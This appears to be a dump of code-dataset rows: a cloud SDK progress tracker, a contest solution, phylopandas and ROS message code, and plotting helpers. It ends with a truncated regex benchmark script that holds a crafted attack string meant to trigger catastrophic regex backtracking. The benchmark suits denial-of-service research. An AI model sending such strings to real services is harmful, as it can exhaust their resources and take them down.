sys.stderr.write('\n\nThis operation cannot be cancelled.\n\n')
def _TearDownSignalHandler(self):
if self._restore_old_handler:
try:
signal.signal(signal.SIGINT, self._old_signal_handler)
except ValueError:
pass # only works in main thread
def __enter__(self):
self._SetupOutput()
# Setup signal handlers
self._SetUpSignalHandler()
log.file_only_logger.info(self._message)
self._Print()
if self._autotick:
def Ticker():
while True:
_SleepSecs(self._tick_delay)
if self.Tick():
return
self._ticker = threading.Thread(target=Ticker)
self._ticker.daemon = True
self._ticker.start()
return self
def __exit__(self, unused_ex_type, exc_value, unused_traceback):
with self._lock:
self._done = True
# If an exception was raised during progress tracking, exit silently here
# and let the appropriate exception handler tell the user what happened.
if exc_value:
if self._exception_is_uncaught:
self._HandleUncaughtException(exc_value)
else:
self._PrintExitOutput()
if self._ticker:
self._ticker.join()
self._TearDownSignalHandler()
def _HandleUncaughtException(self, exc_value):
# The first print is to signal exiting the stage. The second print
# handles the output for exiting the progress tracker.
if isinstance(exc_value, console_io.OperationCancelledError):
self._PrintExitOutput(aborted=True)
else:
# This means this was an uncaught exception. This ideally
# should be handled by the implementer
self._PrintExitOutput(failed=True)
@abc.abstractmethod
def _SetupOutput(self):
"""Sets up the output for the tracker. Gets called during __enter__."""
pass
def _GetTickMark(self, ticks):
"""Returns the next tick mark."""
return self._symbols.spin_marks[self._ticks % len(self._symbols.spin_marks)]
def _GetStagedCompletedSuffix(self, status):
return status.value
def _ValidateStage(self, stage):
"""Validates the stage belongs to the tracker and has not been completed."""
if stage not in self._stages:
raise ValueError('This stage does not belong to this progress tracker.')
if stage in self._completed_stages:
raise ValueError('This stage has already completed.')
def StartStage(self, stage):
"""Informs the progress tracker that this stage has started."""
self._ValidateStage(stage)
with self._lock:
self._running_stages.add(stage)
stage.status = StageCompletionStatus.RUNNING
self._StartStage(stage)
def _StartStage(self, stage):
return
def UpdateStage(self, stage, message):
"""Updates a stage in the progress tracker."""
# TODO(b/109928970): Add support for progress bars.
self._ValidateStage(stage)
with self._lock:
stage.message = message
def CompleteStage(self, stage, message=None):
"""Informs the progress tracker that this stage has completed."""
self._ValidateStage(stage)
with self._lock:
stage.status = StageCompletionStatus.SUCCESS
stage._is_done = True # pylint: disable=protected-access
self._running_stages.remove(stage)
if message is not None:
stage.message = message
self._CompleteStage(stage)
self.Tick() # This ensures output is properly flushed out.
def _CompleteStage(self, stage):
return
def FailStage(self, stage, failure_exception=None, message=None):
"""Informs the progress tracker that this stage has failed."""
self._ValidateStage(stage)
with self._lock:
stage.status = StageCompletionStatus.FAILED
stage._is_done = True # pylint: disable=protected-access
self._running_stages.remove(stage)
if message is not None:
stage.message = message
self._FailStage(stage, failure_exception, message)
self.Tick() # This ensures output is properly flushed out.
if failure_exception:
self._PrintExitOutput(failed=True)
self._exception_is_uncaught = False
raise failure_exception # pylint: disable=raising-bad-type
class _NormalStagedProgressTracker(_BaseStagedProgressTracker):
"""A context manager for telling the user about long-running progress.
This class uses the core.console.multiline.ConsoleOutput interface for
outputting. The header and each stage is defined as a message object
contained by the ConsoleOutput message.
"""
def __init__(self, *args, **kwargs):
self._running_stages_queue = []
self._stage_being_displayed = None
super(_NormalStagedProgressTracker, self).__init__(*args, **kwargs)
def _SetupOutput(self):
# Console outputting objects
self._console_output = multiline.SimpleSuffixConsoleOutput(self._stream)
self._header_message = self._console_output.AddMessage(self._message)
self._current_stage_message = self._header_message
def _FailStage(self, stage, failure_exception=None, message=None):
for running_stage in self._running_stages_queue:
if stage != running_stage:
running_stage.status = StageCompletionStatus.INTERRUPTED
running_stage._is_done = True # pylint: disable=protected-access
def _StartStage(self, stage):
"""Informs the progress tracker that this stage has started."""
self._running_stages_queue.append(stage)
if self._stage_being_displayed is None:
self._LoadNextStageForDisplay()
def _LoadNextStageForDisplay(self):
if self._running_stages_queue:
self._stage_being_displayed = self._running_stages_queue[0]
self._SetUpOutputForStage(self._stage_being_displayed)
return True
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
This method also handles loading new stages and flushing out completed
stages.
Returns:
Whether progress has completed.
"""
with self._lock:
if not self._done:
self._ticks += 1
# Flush output for any stages that may already be finished
if self._stage_being_displayed is None:
self._LoadNextStageForDisplay()
else:
while (self._running_stages_queue and
self._running_stages_queue[0].is_done):
completed_stage = self._running_stages_queue.pop(0)
self._completed_stages.append(completed_stage)
completion_status = self._GetStagedCompletedSuffix(
self._stage_being_displayed.status)
self._Print(completion_status)
if not self._LoadNextStageForDisplay():
self._stage_being_displayed = None
if self._stage_being_displayed:
self._Print(self._GetTickMark(self._ticks))
return self._done
def _PrintExitOutput(self, aborted=False, failed=False):
"""Handles the final output for the progress tracker."""
self._SetupExitOutput()
if aborted:
msg = self._aborted_message or 'Aborted.'
elif failed:
msg = self._failure_message or 'Failed.'
else:
msg = self._success_message or 'Done.'
if self._done_message_callback:
msg += ' ' + self._done_message_callback()
self._Print(msg + '\n')
def _SetupExitOutput(self):
"""Sets up output to print out the closing line."""
self._current_stage_message = self._console_output.AddMessage('')
def _HandleUncaughtException(self, exc_value):
# The first print is to signal exiting the stage. The second print
# handles the output for exiting the progress tracker.
if isinstance(exc_value, console_io.OperationCancelledError):
self._Print('aborted by ctrl-c')
self._PrintExitOutput(aborted=True)
else:
# This means this was an uncaught exception. This ideally
# should be handled by the implementer
self._Print(
self._GetStagedCompletedSuffix(StageCompletionStatus.FAILED))
self._PrintExitOutput(failed=True)
def _SetUpOutputForStage(self, stage):
def _FormattedCallback():
if stage.message:
return ' ' + stage.message + '...'
return None
self._current_stage_message = self._console_output.AddMessage(
stage.header,
indentation_level=1,
detail_message_callback=_FormattedCallback)
def _Print(self, message=''):
"""Prints an update containing message to the output stream.
Args:
message: str, suffix of message
"""
if not self._output_enabled:
return
if self._current_stage_message:
self._console_output.UpdateMessage(self._current_stage_message, message)
self._console_output.UpdateConsole()
class _NonInteractiveStagedProgressTracker(_NormalStagedProgressTracker):
"""A context manager for telling the user about long-running progress."""
def _SetupExitOutput(self):
"""Sets up output to print out the closing line."""
# Not necessary for non-interactive implementation
return
def _SetupOutput(self):
self._Print(self._message + '\n')
def _GetTickMark(self, ticks):
"""Returns the next tick mark."""
return '.'
def _GetStagedCompletedSuffix(self, status):
return status.value + '\n'
def _SetUpOutputForStage(self, stage):
message = stage.header
if stage.message:
message += ' ' + stage.message + '...'
self._Print(message)
def _Print(self, message=''):
"""Prints an update containing message to the output stream.
Args:
message: str, suffix of message
"""
if not self._output_enabled:
return
self._stream.write(message)
class _MultilineStagedProgressTracker(_BaseStagedProgressTracker):
"""A context manager for telling the user about long-running progress.
This class uses the core.console.multiline.ConsoleOutput interface for
outputting. The header and each stage is defined as a message object
contained by the ConsoleOutput message.
"""
def UpdateHeaderMessage(self, message):
# Next tick will handle actually updating the message. Using tick here to
# update the message will cause a deadlock when _NotifyUninterruptableError
# is called.
self._header_stage.message = message
def _UpdateHeaderMessage(self, prefix):
message = prefix + self._message
if self._header_stage.message:
message += ' ' + self._header_stage.message
self._console_output.UpdateMessage(self._header_message, message)
def _NotifyUninterruptableError(self):
with self._lock:
self.UpdateHeaderMessage('This operation cannot be cancelled.')
self.Tick()
def _SetupExitOutput(self):
"""Sets up output to print out the closing line."""
return self._console_output.AddMessage('')
def _PrintExitOutput(self, aborted=False, failed=False):
"""Handles the final output for the progress tracker."""
output_message = self._SetupExitOutput()
if aborted:
msg = self._aborted_message or 'Aborted.'
# Aborted is the same as overall failed progress.
self._header_stage.status = StageCompletionStatus.FAILED
elif failed:
msg = self._failure_message or 'Failed.'
self._header_stage.status = StageCompletionStatus.FAILED
else:
msg = self._success_message or 'Done.'
self._header_stage.status = StageCompletionStatus.SUCCESS
if self._done_message_callback:
msg += ' ' + self._done_message_callback()
self._console_output.UpdateMessage(output_message, msg)
# If for some reason some stage did not complete, mark it as interrupted.
self._Print(self._symbols.interrupted)
def _SetupOutput(self):
# Console outputting objects
self._maintain_queue = False
self._console_output = multiline.MultilineConsoleOutput(self._stream)
self._header_message = self._console_output.AddMessage(self._message)
self._header_stage = Stage('') # Use a Stage object to hold header state.
self._header_stage.status = StageCompletionStatus.RUNNING
self._stage_messages = dict()
for stage in self._stages:
self._stage_messages[stage] = self._console_output.AddMessage(
stage.header, indentation_level=1)
self._UpdateStageTickMark(stage)
self._console_output.UpdateConsole()
def _GenerateStagePrefix(self, stage_status, tick_mark):
if stage_status == StageCompletionStatus.NOT_STARTED:
tick_mark = self._symbols.not_started
elif stage_status == StageCompletionStatus.SUCCESS:
tick_mark = self._symbols.success
elif stage_status == StageCompletionStatus.FAILED:
tick_mark = self._symbols.failed
elif stage_status == StageCompletionStatus.INTERRUPTED:
tick_mark = self._symbols.interrupted
return tick_mark + ' ' * (self._symbols.prefix_length - len(tick_mark))
def _UpdateStageTickMark(self, stage, tick_mark=''):
prefix = self._GenerateStagePrefix(stage.status, tick_mark)
message = stage.header
if stage.message:
message += ' ' + stage.message
self._console_output.UpdateMessage(
self._stage_messages[stage], prefix + message)
def _FailStage(self, stage, exception=None, message=None):
"""Informs the progress tracker that this stage has failed."""
self._UpdateStageTickMark(stage)
if exception:
for other_stage in self._stages:
if (other_stage != stage and
other_stage.status == StageCompletionStatus.RUNNING):
other_stage.status = StageCompletionStatus.INTERRUPTED
other_stage._is_done = True # pylint: disable=protected-access
def _CompleteStage(self, stage):
self._UpdateStageTickMark(stage)
def Tick(self):
"""Give a visual indication to the user that some progress has been made.
Output is sent to sys.stderr. Nothing is shown if output is not a TTY.
This method also handles loading new stages and flushing out completed
stages.
Returns:
Whether progress has completed.
"""
with self._lock:
if not self._done:
self._ticks += 1
self._Print(self._GetTickMark(self._ticks))
return self._done
def _Print(self, tick_mark=''):
"""Prints an update containing message to the output stream.
Args:
tick_mark: str, suffix of message
"""
if not self._output_enabled:
return
header_prefix = self._GenerateStagePrefix(
self._header_stage.status, tick_mark)
self._UpdateHeaderMessage(header_prefix)
for stage in self._running_stages:
self._UpdateStageTickMark(stage, tick_mark)
self._console_output.UpdateConsole()
class _NoOpStagedProgressTracker(_StagedProgressTrackerInterface):
"""A staged progress tracker that doesn't do anything."""
def __init__(self, stages, interruptable, aborted_message):
super(_NoOpStagedProgressTracker, self).__init__(stages)
self._interruptable = interruptable
self._aborted_message = aborted_message
self._done = False
def __enter__(self):
def _CtrlCHandler(unused_signal, unused_frame):
if self._interruptable:
raise console_io.OperationCancelledError(self._aborted_message)
self._old_signal_handler = signal.signal(signal.SIGINT, _CtrlCHandler)
return self
def _Print(self, message=''):
# Non-interactive progress tracker should not print anything.
return
def Tick(self):
return self._done
def StartStage(self, stage):
return
def UpdateStage(self, stage, message):
return
def CompleteStage(self, stage, message=None):
return
def FailStage(self, stage, exception, message=None):
raise exception
def __exit__(self, exc_type, exc_val, exc_tb):
self._done = True
signal.signal(signal.SIGINT, self._old_signal_handler)
class _StubStagedProgressTracker(_NoOpStagedProgressTracker):
"""Staged tracker that only prints deterministic start and end points.
No UX about tracking should be exposed here. This is strictly for being able
to tell that the tracker ran, not what it actually looks like.
"""
def __init__(self, message, stages, interruptable, aborted_message):
super(_StubStagedProgressTracker, self).__init__(
stages, interruptable, aborted_message)
self._message = message
self._succeeded_stages = []
self._failed_stage = None
self._stream = sys.stderr
def CompleteStage(self, stage, message=None):
self._succeeded_stages.append(stage.header)
def FailStage(self, stage, exception, message=None):
self._failed_stage = stage.header
raise exception
def __exit__(self, exc_type, exc_val, exc_tb):
if not exc_val:
status = 'SUCCESS'
elif isinstance(exc_val, console_io.OperationCancelledError):
status = 'INTERRUPTED'
else:
status = 'FAILURE'
if log.IsUserOutputEnabled():
self._stream.write(console_io.JsonUXStub(
console_io.UXElementType.STAGED_PROGRESS_TRACKER,
message=self._message, status=status,
succeeded_stages=self._succeeded_stages,
failed_stage=self._failed_stage) + '\n')
return super(
_StubStagedProgressTracker, self).__exit__(exc_type, exc_val, exc_tb)
| [
"cloudsdk.mirror@gmail.com"
] | cloudsdk.mirror@gmail.com |
6d92d61ee82ad1d16aafdda4e576c854454eb802 | eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e | /atcoder/abc/abc301-400/abc302/b.py | 289515c914038268c91d8ae04c92359c07516a7e | [] | no_license | reo11/AtCoder | 4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9 | 69c6d67f05cb9190d8fb07204488cd7ce4d0bed2 | refs/heads/master | 2023-08-28T10:54:50.859288 | 2023-08-22T18:52:47 | 2023-08-22T18:52:47 | 162,085,118 | 4 | 0 | null | 2023-07-01T14:17:28 | 2018-12-17T06:31:10 | Python | UTF-8 | Python | false | false | 960 | py | h, w = map(int, input().split())
s = [list(input()) for _ in range(h)]
target = list("snuke")
dxy = [[1, 0], [-1, 0], [0, 1], [0, -1], [1, 1], [-1, 1], [1, -1], [-1, -1]]
for i in range(h):
for j in range(w):
if target[0] == s[i][j]:
for dx, dy in dxy:
flag = True
ans = [f"{i + 1} {j + 1}"]
for k in range(1, 5):
if i + k * dy < 0 or i + k * dy >= h:
flag = False
break
if j + k * dx < 0 or j + k * dx >= w:
flag = False
break
if target[k] == s[i + k * dy][j + k * dx]:
ans.append(f"{i + k * dy + 1} {j + k * dx + 1}")
else:
flag = False
break
if flag:
print(*ans, sep="\n")
exit()
| [
"reohirao116@gmail.com"
] | reohirao116@gmail.com |
a6b556baf1bf87f81e28b23ca9146eb2f4c411af | a683503b48ba7c0a0563668ccdd3a455e2ce0053 | /bin/django-admin.py | a4eb5213e7fadb6676855b7e9d2b591a4ab0eef5 | [] | no_license | dskiranraj/survaider | 1c60d46c01167246617b1ba3dc0bde5b69b67a06 | 5d601321aecc9b831624d8a4a83ca84088805095 | refs/heads/master | 2020-06-22T23:08:18.108169 | 2019-07-23T12:24:43 | 2019-07-23T12:24:43 | 198,425,157 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 155 | py | #!/home/ambertag/Desktop/survaider/bin/python3.6
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
| [
"you@example.com"
] | you@example.com |
518b4196e8bf056b4b5e8da9a147b688b1451695 | 6634436cf4f0e4d674cf497e57e5750f9ac415aa | /phylopandas/treeio/write.py | cbb1ec02fff13e127e16464606f9e2e1c78e1529 | [
"BSD-3-Clause"
] | permissive | ScottCarrara/phylopandas | dc946d552ad48b6314a60e845356318b33fbe860 | f163c4a2b9369eb32f6c8f3793f711f6fe4e6130 | refs/heads/master | 2020-05-19T19:44:45.752770 | 2018-11-12T06:55:47 | 2018-11-12T06:56:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,846 | py | import pandas
import dendropy
def _write_doc_template(schema):
s = """Write to {} format.
Parameters
----------
filename : str
File to write {} string to. If no filename is given, a {} string
will be returned.
taxon_col : str (default='sequence')
Sequence column name in DataFrame.
taxon_annotations : str
List of columns to annotation in the tree taxon.
node_col : str (default='id')
ID column name in DataFrame
node_annotations : str
List of columns to annotation in the node taxon.
branch_lengths : bool (default=False)
If True, use only the ID column to label sequences in fasta.
""".format(schema, schema, schema)
return s
def _pandas_df_to_dendropy_tree(
df,
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True,
):
"""Turn a phylopandas dataframe into a dendropy tree.
Parameters
----------
df : DataFrame
DataFrame containing tree data.
taxon_col : str (optional)
Column in dataframe to label the taxon. If None, the index will be used.
taxon_annotations : str
List of columns to annotation in the tree taxon.
node_col : str (optional)
Column in dataframe to label the nodes. If None, the index will be used.
node_annotations : str
List of columns to annotation in the node taxon.
branch_lengths : bool
If True, inclues branch lengths.
"""
if isinstance(taxon_col, str) is False:
raise Exception("taxon_col must be a string.")
if isinstance(node_col, str) is False:
raise Exception("taxon_col must be a string.")
# Construct a list of nodes from dataframe.
taxon_namespace = dendropy.TaxonNamespace()
nodes = {}
for idx in df.index:
# Get node data.
data = df.loc[idx]
# Get taxon for node (if leaf node).
taxon = None
if data['type'] == 'leaf':
taxon = dendropy.Taxon(label=data[taxon_col])
# Add annotations data.
for ann in taxon_annotations:
taxon.annotations.add_new(ann, data[ann])
taxon_namespace.add_taxon(taxon)
# Get label for node.
label = data[node_col]
# Get edge length.
edge_length = None
if branch_lengths is True:
edge_length = data['length']
# Build a node
n = dendropy.Node(
taxon=taxon,
label=label,
edge_length=edge_length
)
# Add node annotations
for ann in node_annotations:
n.annotations.add_new(ann, data[ann])
nodes[idx] = n
# Build branching pattern for nodes.
root = None
for idx, node in nodes.items():
# Get node data.
data = df.loc[idx]
# Get children nodes
children_idx = df[df['parent'] == data['id']].index
children_nodes = [nodes[i] for i in children_idx]
# Set child nodes
nodes[idx].set_child_nodes(children_nodes)
# Check if this is root.
if data['parent'] is None:
root = nodes[idx]
# Build tree.
tree = dendropy.Tree(
seed_node=root,
taxon_namespace=taxon_namespace
)
return tree
def _write(
df,
filename=None,
schema='newick',
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True,
**kwargs
):
"""Write a phylopandas tree DataFrame to various formats.
Parameters
----------
df : DataFrame
DataFrame containing tree data.
filename : str
filepath to write out tree. If None, will return string.
schema : str
tree format to write out.
taxon_col : str (optional)
Column in dataframe to label the taxon. If None, the index will be used.
taxon_annotations : str
List of columns to annotation in the tree taxon.
node_col : str (optional)
Column in dataframe to label the nodes. If None, the index will be used.
node_annotations : str
List of columns to annotation in the node taxon.
branch_lengths : bool
If True, inclues branch lengths.
"""
tree = _pandas_df_to_dendropy_tree(
df,
taxon_col=taxon_col,
taxon_annotations=taxon_annotations,
node_col=node_col,
node_annotations=node_annotations,
branch_lengths=branch_lengths,
)
# Write out format
print(schema)
if filename is not None:
tree.write(path=filename, schema=schema, suppress_annotations=False, **kwargs)
else:
return tree.as_string(schema=schema)
def _write_method(schema):
"""Add a write method for named schema to a class.
"""
def method(
self,
filename=None,
schema=schema,
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True,
**kwargs):
# Use generic write class to write data.
return _write(
self._data,
filename=filename,
schema=schema,
taxon_col=taxon_col,
taxon_annotations=taxon_annotations,
node_col=node_col,
node_annotations=node_annotations,
branch_lengths=branch_lengths,
**kwargs
)
# Update docs
method.__doc__ = _write_doc_template(schema)
return method
def _write_function(schema):
"""Add a write method for named schema to a class.
"""
def func(
data,
filename=None,
schema=schema,
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True,
**kwargs):
# Use generic write class to write data.
return _write(
data,
filename=filename,
schema=schema,
taxon_col=taxon_col,
taxon_annotations=taxon_annotations,
node_col=node_col,
node_annotations=node_annotations,
branch_lengths=branch_lengths,
**kwargs
)
# Update docs
func.__doc__ = _write_doc_template(schema)
return func
def to_dendropy(
data,
taxon_col='uid',
taxon_annotations=[],
node_col='uid',
node_annotations=[],
branch_lengths=True):
return _pandas_df_to_dendropy_tree(
data,
taxon_col=taxon_col,
taxon_annotations=taxon_annotations,
node_col=node_col,
node_annotations=node_annotations,
branch_lengths=branch_lengths,
)
to_newick = _write_function('newick')
to_nexml = _write_function('nexml')
to_nexus_tree = _write_function('nexus')
| [
"zachsailer@gmail.com"
] | zachsailer@gmail.com |
30a59c7f55545090058475dd238a15e2ff6ab9e4 | 4b1b00f977c27d71b6fe0fab64a9ca09a85a4c09 | /src/vis/visualization.py | 89649b4a0d43ebb6222831997b7667cc2a2da414 | [] | no_license | zhouyanasd/SNN_framework | 67e3d31ef9e709d0b8cb1d18618291f264b006f6 | ba3ab08ac350507120d1ab840701b27014db70e2 | refs/heads/master | 2021-09-29T02:38:10.144613 | 2017-10-24T02:13:10 | 2017-10-24T02:13:10 | 108,064,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,236 | py | import src
import numpy as np
import matplotlib.pyplot as plt
class Visualization(object):
def __init__(self, total_time):
self.t = np.arange(0,total_time)
def show(self):
plt.show()
def I(self,neuron):
I = neuron.I
print(I)
plt.figure()
plt.plot(self.t[:],I)
plt.show()
def add_fired_fig(self,fig,Liquid):
ax = fig.add_subplot(3, 1, 2)
for j in range(Liquid.reservoir_list[0].neuron_list.size):
fired = Liquid.reservoir_list[0].neuron_list[j].fired_sequence
for i in fired:
ax.scatter(i,0.5*j,alpha=.5)
def add_data_fig(self,fig,data):
t = np.arange(0,data.size)
plt.plot(t, data)
def add_test_result(self,fig,result,label):
t = np.arange(0,result.size)
plt.scatter(t,result,color="red")
plt.plot(label,"b--",color="blue")
def add_neu_mem(self,fig,neu):
plt.plot(self.t,neu.membrane_potential[:,0])
def add_neu_mem_n(self,Liquid,start,end):
for i in range(end - start):
fig = plt.figure(figsize=(15,4))
neu = Liquid.reservoir_list[0].neuron_list[i+start]
self.add_neu_mem(fig,neu)
| [
"zhouyanasd@gmail.com"
] | zhouyanasd@gmail.com |
227f04b3d503b43d52399f13429478dcd52f392a | 72cc56c488930ed632070a1d23c340b6835c24b5 | /Robotics/ca/devel/lib/python2.7/dist-packages/caros_universalrobot/msg/_RobotState.py | 3daabcd8d230f21fe0211e557214ddd8aeca826b | [] | no_license | Keerthikan/ROVI2 | 856b9cb9706ee3ab14f41ce51cc5c6a5f8113225 | 46c6f3dac80207935d87a6f6a39b48c766e302a4 | refs/heads/master | 2021-01-18T22:07:57.035506 | 2016-05-19T08:58:13 | 2016-05-19T08:58:13 | 51,436,830 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,508 | py | # This Python file uses the following encoding: utf-8
"""autogenerated by genpy from caros_universalrobot/RobotState.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import caros_common_msgs.msg
import std_msgs.msg
class RobotState(genpy.Message):
_md5sum = "085b53002a7297f33a35f15c71b21bba"
_type = "caros_universalrobot/RobotState"
_has_header = True #flag to mark the presence of a Header object
_full_text = """#RobotState represents the state of one a single robot in the setup.
#Header containing information about time and frameid
Header header
#Joint configuration.
# Angles should be represented as radians and distances in meters.
caros_common_msgs/Q q
#Velocities should be represented as radians per sec
caros_common_msgs/Q dq
#Is the robot moving
bool is_moving
#Is the robot in collision
bool is_colliding
#Is Emergency Stopped
bool e_stopped
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')
# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: caros_common_msgs/Q
# A configuration Q
float64[] data
"""
__slots__ = ['header','q','dq','is_moving','is_colliding','e_stopped']
_slot_types = ['std_msgs/Header','caros_common_msgs/Q','caros_common_msgs/Q','bool','bool','bool']
def __init__(self, *args, **kwds):
"""
Constructor. Any message fields that are implicitly/explicitly
set to None will be assigned a default value. The recommend
use is keyword arguments as this is more robust to future message
changes. You cannot mix in-order arguments and keyword arguments.
The available fields are:
header,q,dq,is_moving,is_colliding,e_stopped
:param args: complete set of field values, in .msg order
:param kwds: use keyword arguments corresponding to message field names
to set specific fields.
"""
if args or kwds:
super(RobotState, self).__init__(*args, **kwds)
#message fields cannot be None, assign default values for those that are
if self.header is None:
self.header = std_msgs.msg.Header()
if self.q is None:
self.q = caros_common_msgs.msg.Q()
if self.dq is None:
self.dq = caros_common_msgs.msg.Q()
if self.is_moving is None:
self.is_moving = False
if self.is_colliding is None:
self.is_colliding = False
if self.e_stopped is None:
self.e_stopped = False
else:
self.header = std_msgs.msg.Header()
self.q = caros_common_msgs.msg.Q()
self.dq = caros_common_msgs.msg.Q()
self.is_moving = False
self.is_colliding = False
self.e_stopped = False
def _get_types(self):
"""
internal API method
"""
return self._slot_types
def serialize(self, buff):
"""
serialize message into buffer
:param buff: buffer, ``StringIO``
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.q.data)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.q.data))
length = len(self.dq.data)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(struct.pack(pattern, *self.dq.data))
_x = self
buff.write(_struct_3B.pack(_x.is_moving, _x.is_colliding, _x.e_stopped))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize(self, str):
"""
unpack serialized message in str into this message instance
:param str: byte array of serialized message, ``str``
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.q is None:
self.q = caros_common_msgs.msg.Q()
if self.dq is None:
self.dq = caros_common_msgs.msg.Q()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.q.data = struct.unpack(pattern, str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.dq.data = struct.unpack(pattern, str[start:end])
_x = self
start = end
end += 3
(_x.is_moving, _x.is_colliding, _x.e_stopped,) = _struct_3B.unpack(str[start:end])
self.is_moving = bool(self.is_moving)
self.is_colliding = bool(self.is_colliding)
self.e_stopped = bool(self.e_stopped)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
def serialize_numpy(self, buff, numpy):
"""
serialize message with numpy array types into buffer
:param buff: buffer, ``StringIO``
:param numpy: numpy python module
"""
try:
_x = self
buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
_x = self.header.frame_id
length = len(_x)
if python3 or type(_x) == unicode:
_x = _x.encode('utf-8')
length = len(_x)
if python3:
buff.write(struct.pack('<I%sB'%length, length, *_x))
else:
buff.write(struct.pack('<I%ss'%length, length, _x))
length = len(self.q.data)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.q.data.tostring())
length = len(self.dq.data)
buff.write(_struct_I.pack(length))
pattern = '<%sd'%length
buff.write(self.dq.data.tostring())
_x = self
buff.write(_struct_3B.pack(_x.is_moving, _x.is_colliding, _x.e_stopped))
except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
"""
unpack serialized message in str into this message instance using numpy for array types
:param str: byte array of serialized message, ``str``
:param numpy: numpy python module
"""
try:
if self.header is None:
self.header = std_msgs.msg.Header()
if self.q is None:
self.q = caros_common_msgs.msg.Q()
if self.dq is None:
self.dq = caros_common_msgs.msg.Q()
end = 0
_x = self
start = end
end += 12
(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
start = end
end += length
if python3:
self.header.frame_id = str[start:end].decode('utf-8')
else:
self.header.frame_id = str[start:end]
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.q.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
start = end
end += 4
(length,) = _struct_I.unpack(str[start:end])
pattern = '<%sd'%length
start = end
end += struct.calcsize(pattern)
self.dq.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
_x = self
start = end
end += 3
(_x.is_moving, _x.is_colliding, _x.e_stopped,) = _struct_3B.unpack(str[start:end])
self.is_moving = bool(self.is_moving)
self.is_colliding = bool(self.is_colliding)
self.e_stopped = bool(self.e_stopped)
return self
except struct.error as e:
raise genpy.DeserializationError(e) #most likely buffer underfill
_struct_I = genpy.struct_I
_struct_3B = struct.Struct("<3B")
_struct_3I = struct.Struct("<3I")
| [
"kerat12@student.sdu.dk"
] | kerat12@student.sdu.dk |
ea2d61ae0c1e7e0201572dfe99c9e2b60c194f4c | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/python_re2_test_file/regexlib_8042.py | 7f3731ea0b2889199ad4f7f644c3eb4d522ba376 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | # 8042
# [0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:""+"0"*20000+"!1 _SLQ_1"
import re2 as re
from time import perf_counter
regex = """[0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*"""
REGEX = re.compile(regex)
for i in range(0, 150000):
